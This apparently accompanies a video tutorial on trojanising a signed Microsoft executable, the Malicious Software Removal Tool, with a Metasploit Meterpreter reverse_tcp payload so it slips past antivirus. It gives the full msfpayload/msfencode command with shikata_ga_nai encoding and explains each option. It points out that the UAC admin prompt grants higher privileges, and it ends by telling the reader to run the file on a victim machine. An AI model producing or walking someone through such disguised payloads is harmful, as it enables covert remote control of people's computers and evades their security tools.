Hide Payload In Trusted EXE to Bypass AV's

This is a video to show you how to hide the Metasploit Meterpreter payload in a trusted exe to help bypass antivirus detection.


Obviously this is useful and this method is very effective


In my demonstration I use the Microsoft Malicious Software Removal Tool (hehe the irony) This is good for the following reasons:
1.Has the Microsoft Signature (helps when trying to go undetected)
2.Asks the user to run in admin mode with the UAC giving use higher privs :)





To keep the payload undetected and hidden from AV's I recommend injecting it into a trusted exe. In the video I use the Microsoft's Software Removal Tool. The good thing about this exe is it works! not all exe's will work so you will have to do some testing. For example the payload might not execute correctly so u will have to test this your self. But the best thing is that the exe from Microsoft asks the user to run as admin which means on windows vista/7 you will be able to get higher privliges and be able to run commands like "schedueleme" shown in my Backdoor video.


./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT= R|./msfencode -c 5 -e x86/shikata_ga_nai -x /root/ -t exe > /root/

OK so what this code does is

(./msfpayload windows/meterpreter/reverse_tcp LHOST=***.***.***.*** LPORT=***.***.***.***)= the basic metasploit meterpreter payload config

(R)= creates the payload and keeps it RAW without encoding it into an exe for example

(|./msfencode)= pipes the RAW payload into the encode process.

(./msfencode -c 5 -e x86/shikata_ga_nai)= this encodes the payload 5 times with the x86/shikata_ga_nai encoder.

(-x /root/ -t exe > /root/name.exe)= send raw encoded payload and inject it into the trusted exe then with the new file call it name.exe








then execute on victim machine and bingo :)